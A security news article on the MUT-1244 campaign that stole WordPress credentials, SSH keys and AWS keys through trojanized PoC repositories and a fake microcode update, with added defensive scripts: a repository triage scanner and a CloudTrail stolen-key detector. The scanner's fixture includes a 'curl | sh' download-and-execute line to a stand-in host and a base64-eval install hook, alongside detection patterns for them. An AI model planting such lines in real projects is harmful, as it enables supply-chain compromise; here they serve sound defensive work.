Researchers at Datadog Security Labs have uncovered a year-long, large-scale cybercrime campaign by a threat actor tracked as MUT-1244. The operation, which blends social engineering with technical exploitation, has resulted in the theft of more than 390,000 WordPress credentials.
The actor also exfiltrated SSH private keys and AWS access keys from compromised systems. The victim pool is unusual: red teamers, penetration testers and security researchers on one side, and other malicious actors on the other, all of whom had a reason to run the tools MUT-1244 trojanized.
Tactics, techniques, and procedures (TTPs)
MUT-1244's methods demonstrate a sophisticated understanding of its targets. The cornerstone of the operation was a trojanized WordPress credentials checker, a type of tool used by security professionals and cybercriminals alike to validate WordPress logins. Victims infected their own systems while attempting to test credentials, so the lure was the tool's core function, which both legitimate and illicit users need.
The credentials checker was not the only delivery vector. The same second-stage payload reached victims through two further routes:
- Trojanized GitHub repositories: Dozens of fake repositories were seeded with malicious proof-of-concept (PoC) exploits. These PoCs targeted known vulnerabilities, luring ethical hackers and adversaries searching for exploit code.
Jason Soroko, Senior Fellow at Sectigo, explained: "Attackers set up dozens of GitHub repositories with fake proof-of-concept exploits. Victims who were security pros, red teamers, and threat actors unknowingly installed malicious second-stage payloads that stole credentials and keys. Simultaneously, a phishing campaign tricked targets into installing a fake kernel update. These trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds. By downloading and running this code, victims essentially infected themselves."
- Phishing campaigns: Victims received emails urging them to install a fake kernel upgrade presented as a CPU microcode update. Once executed, the bogus installer ran commands that installed the malware payload, compromising the victim's system.
Stephen Kowski, Field CTO at SlashNext, emphasized: "The attack used multiple methods to compromise victims. Trojanized GitHub repositories containing malicious code posed as legitimate proof-of-concept exploits, luring security professionals to download and run them. A phishing campaign also tricked targets into installing malware disguised as a CPU update, widening the attack surface."
Both approaches exploit the same weakness: the curiosity and day-to-day operational needs of people who handle exploit code and system updates for a living.
Implications for the cybersecurity community
This campaign represents a striking example of the risks inherent in the offensive security space. By targeting security professionals—including red teamers and researchers—MUT-1244 gained access to tools, techniques, and credentials that could facilitate additional attacks or provide insights into sensitive operations. Additionally, the theft of SSH private keys and AWS access keys underscores the campaign’s broader implications for enterprise security.
Casey Ellis, Founder and Advisor at Bugcrowd, commented: "Targeting red-teamers and security researchers through fake POCs is a troll technique as old as security research itself. However, as this attack demonstrates, it can also be an effective approach to watering-hole attacks. This is a good reminder for those who provide offensive security services that they themselves are part of an exploitable supply chain, and that malicious attackers know this."
The threat of fake PoC exploits
The use of malicious PoC exploits is not new but remains a potent strategy for targeting cybersecurity professionals. By exploiting the desire for cutting-edge exploit code, adversaries can compromise even the most security-conscious individuals. In this case, the fake repositories and phishing emails undermined the trust essential to open-source and collaborative security efforts.
Stephen Kowski added: "This attack targeted the software development pipeline by corrupting widely-used libraries and tools. The malicious code could spread to numerous downstream applications and systems once installed. The use of popular code-sharing platforms like GitHub as an attack vector shows the critical need for robust verification processes and real-time threat detection in development workflows."
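The practical defence against a fake PoC is to read what it will run before it runs. The script below is an added example, not code from the article, from Datadog, or from the campaign's repositories: it walks a checked-out directory and flags the generic mechanisms that smuggle a second stage into "exploit code" (npm lifecycle hooks, setuptools install overrides, download-and-execute pipes, base64-decode-and-eval). The sample repository it builds in a temporary directory is a constructed fixture; the file names, patterns and rule names are the example's own assumptions about what a malicious PoC tends to contain.

```python
"""Pre-execution triage of an untrusted proof-of-concept repository (added example).

Walks a checked-out directory and flags mechanisms commonly used to smuggle a
second-stage payload into "exploit code": package-manager lifecycle hooks that
run on install, setup.py install overrides, and download-and-execute or
base64-decode-and-eval one-liners buried in build scripts. A hit is a reason to
read that file before running anything, not proof of malice.
"""
from __future__ import annotations

import json
import os
import re
import tempfile
from pathlib import Path

# Text patterns that mean "runs code that is not visible in the source as written".
SUSPICIOUS_PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "base64-decode": re.compile(
        r"base64\s+(-d|--decode)\b|b64decode\(|Buffer\.from\([^)]*['\"]base64['\"]"),
    "dynamic-eval": re.compile(r"\b(eval|exec)\s*\("),
}
# npm scripts that run automatically on `npm install`, before any PoC is invoked.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# setuptools hooks that run on `pip install .` (custom install command classes).
SETUP_HOOK = re.compile(r"cmdclass\s*=|setuptools\.command\.install|class\s+\w+\(\s*install\s*\)")
SKIP_DIRS = {".git", "node_modules", "__pycache__"}


def scan_file(path: Path) -> list[tuple[str, str]]:
    """Return (rule, detail) findings for one file; empty list if nothing matched."""
    findings: list[tuple[str, str]] = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    if path.name == "package.json":
        try:
            data = json.loads(text)
        except json.JSONDecodeError:
            data = {}
        scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
        for hook in sorted(NPM_HOOKS & set(scripts)):
            findings.append(("npm-lifecycle-hook", f"{hook}: {scripts[hook]}"))
    if path.name == "setup.py" and SETUP_HOOK.search(text):
        findings.append(("setuptools-install-hook", "custom install command in setup.py"))
    for rule, pattern in SUSPICIOUS_PATTERNS.items():
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((rule, f"line {line_no}: {m.group(0)[:60]}"))
    return findings


def triage_repo(root: str) -> dict[str, list[tuple[str, str]]]:
    """Map each flagged file (path relative to root) to its findings."""
    root_path = Path(root)
    report: dict[str, list[tuple[str, str]]] = {}
    for dirpath, dirnames, filenames in os.walk(root_path):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = Path(dirpath) / name
            hits = scan_file(full)
            if hits:
                report[str(full.relative_to(root_path))] = hits
    return report


def build_sample_repo() -> str:
    """Constructed fixture, not a real repository: a PoC whose install steps hide a payload."""
    root = tempfile.mkdtemp(prefix="poc-triage-")
    files = {
        "README.md": "# PoC\nRun: python3 exploit.py <target>\n",
        "exploit.py": "import sys\nprint('sending request to', sys.argv[1])\n",
        "package.json": json.dumps({"name": "poc-deps", "scripts": {"postinstall": "node setup.js"}}),
        "setup.js": "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());\n",
        "configure": "#!/bin/sh\ncurl -s http://example.invalid/x | sh\n./real_configure \"$@\"\n",
    }
    for rel, content in files.items():
        (Path(root) / rel).write_text(content)
    return root


if __name__ == "__main__":
    for path, hits in sorted(triage_repo(build_sample_repo()).items()):
        for rule, detail in hits:
            print(f"{path}: [{rule}] {detail}")
```

Run it against a fresh clone before `npm install`, `pip install .` or `./configure`, and do the actual execution only in a disposable VM or container that holds no SSH keys, AWS credentials or agent sockets; the scanner narrows down what to read, it does not replace reading it.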
What organizations can do
- Verify the source of tools: Ensure PoC exploits and other tools come from verified, trusted sources, and treat unfamiliar GitHub repositories with caution. Read the code, including install hooks and build scripts, before running it, and run untrusted PoCs only in an isolated, disposable environment that holds no real credentials.
- Educate security teams: Train red teams and researchers to recognize phishing that exploits operational needs, such as an unsolicited prompt to apply a kernel or microcode update; such updates should be applied only through the distribution's own package channels.
- Implement strong key management: Protect SSH and AWS keys with passphrases or hardware-backed storage, scope them to the minimum access required, prefer short-lived credentials over long-lived access keys where possible, and rotate them on a schedule so a stolen key has a bounded lifetime.
- Monitor for indicators of compromise (IoCs): Watch for unusual WordPress login activity, unexpected changes to GitHub repositories or tokens, and cloud access-key use from unfamiliar IP addresses, user agents or regions; a stolen key is typically used first for reconnaissance from the attacker's own infrastructure.
- Adopt advanced threat detection tools: As Kowski suggests, "Organizations benefit from automated security scanning solutions that analyze dependencies and identify potential threats before they spread through the software supply chain."
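"Unusual cloud access patterns" becomes concrete once you compare each access key's current use against where it has been used before. The following is an added example, not from the article or from Datadog: it builds a per-key baseline of source IPs and user agents from CloudTrail records, flags later calls from a source the key has never used, and raises the severity when the call is an enumeration API, which is what a freshly stolen key is usually used for first. The records use CloudTrail's real field names (`eventTime`, `eventName`, `sourceIPAddress`, `userAgent`, `userIdentity.accessKeyId`) but are constructed; the key IDs, addresses, user-agent strings, cutoff and the list of "recon" calls are the example's own assumptions.

```python
"""Detect a stolen AWS access key being used from an attacker's machine (added example).

From CloudTrail records, build per-access-key baselines of the source IPs and
user agents seen before a cutoff, then flag later calls from a source the key
has never used. Enumeration calls from such a source raise the severity.
Records below are constructed with CloudTrail's real field names; they are not
from any actual account.
"""
from __future__ import annotations

from datetime import datetime, timezone

# API calls an intruder issues to learn what a stolen key can reach (assumed list).
RECON_CALLS = {
    "GetCallerIdentity", "ListBuckets", "ListUsers", "ListAccessKeys",
    "GetAccountAuthorizationDetails", "DescribeInstances", "ListSecrets",
}


def parse_time(value: str) -> datetime:
    """CloudTrail eventTime is ISO-8601 UTC, e.g. 2024-11-10T08:15:00Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def build_baseline(records: list[dict], cutoff: datetime) -> dict[str, dict[str, set]]:
    """accessKeyId -> {'ips': set, 'agents': set} from events before the cutoff."""
    baseline: dict[str, dict[str, set]] = {}
    for r in records:
        key = r["userIdentity"].get("accessKeyId")
        if not key or parse_time(r["eventTime"]) >= cutoff:
            continue
        entry = baseline.setdefault(key, {"ips": set(), "agents": set()})
        entry["ips"].add(r["sourceIPAddress"])
        entry["agents"].add(r["userAgent"])
    return baseline


def detect(records: list[dict], cutoff: datetime) -> list[dict]:
    """Alerts for post-cutoff events where a key is used from an unseen source."""
    baseline = build_baseline(records, cutoff)
    alerts = []
    for r in records:
        key = r["userIdentity"].get("accessKeyId")
        if not key or parse_time(r["eventTime"]) < cutoff:
            continue
        reasons = []
        if key not in baseline:
            # No history to compare against: surface it, but at low severity.
            reasons.append("no baseline for this key")
            severity = "low"
        else:
            if r["sourceIPAddress"] not in baseline[key]["ips"]:
                reasons.append("new source IP")
            if r["userAgent"] not in baseline[key]["agents"]:
                reasons.append("new user agent")
            severity = "high" if r["eventName"] in RECON_CALLS else "medium"
        if not reasons:
            continue
        alerts.append({
            "time": r["eventTime"], "accessKeyId": key, "eventName": r["eventName"],
            "sourceIPAddress": r["sourceIPAddress"], "userAgent": r["userAgent"],
            "reasons": reasons, "severity": severity,
        })
    return alerts


def _rec(time: str, key: str, ip: str, agent: str, event: str) -> dict:
    """Build a minimal constructed CloudTrail record."""
    return {"eventTime": time, "eventName": event, "sourceIPAddress": ip, "userAgent": agent,
            "userIdentity": {"type": "IAMUser", "userName": "ci-deployer", "accessKeyId": key}}


# Constructed sample: the CI key is used from the usual host, then from a new
# host with a different SDK, starting with GetCallerIdentity and ListBuckets.
CLI_UA = "aws-cli/2.15.0 Python/3.11.6 Linux/6.1.0 exe/x86_64"
BOTO_UA = "Boto3/1.34.20 md/Botocore#1.34.20 ua/2.0 os/linux#6.5.0 lang/python#3.12.1"
SAMPLE_RECORDS = [
    _rec("2024-11-01T09:00:00Z", "AKIAEXAMPLE00000001", "203.0.113.10", CLI_UA, "PutObject"),
    _rec("2024-11-02T09:05:00Z", "AKIAEXAMPLE00000001", "203.0.113.10", CLI_UA, "ListObjects"),
    _rec("2024-11-10T08:00:00Z", "AKIAEXAMPLE00000001", "203.0.113.10", CLI_UA, "PutObject"),
    _rec("2024-11-10T08:15:00Z", "AKIAEXAMPLE00000001", "198.51.100.77", BOTO_UA, "GetCallerIdentity"),
    _rec("2024-11-10T08:15:07Z", "AKIAEXAMPLE00000001", "198.51.100.77", BOTO_UA, "ListBuckets"),
    _rec("2024-11-10T09:00:00Z", "AKIAEXAMPLE00000002", "203.0.113.10", CLI_UA, "DescribeInstances"),
]
CUTOFF = parse_time("2024-11-05T00:00:00Z")

if __name__ == "__main__":
    for a in detect(SAMPLE_RECORDS, CUTOFF):
        print(f"{a['time']} {a['severity']:6} {a['accessKeyId']} {a['eventName']} "
              f"from {a['sourceIPAddress']}: {', '.join(a['reasons'])}")
```

In production the baseline would come from a rolling window of CloudTrail events rather than a fixed cutoff, and the source dimension is better expressed as IP range or ASN than as exact address; the structure of the check is the same.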
MUT-1244's campaign demonstrates how advanced threat actors continue to exploit trust and operational needs in cybersecurity. For security professionals, vigilance remains key—not only in protecting their organizations but also in safeguarding their own tools and methodologies. As this incident highlights, the line between attacker and victim can be perilously thin.
Follow SecureWorld News for more stories related to cybersecurity.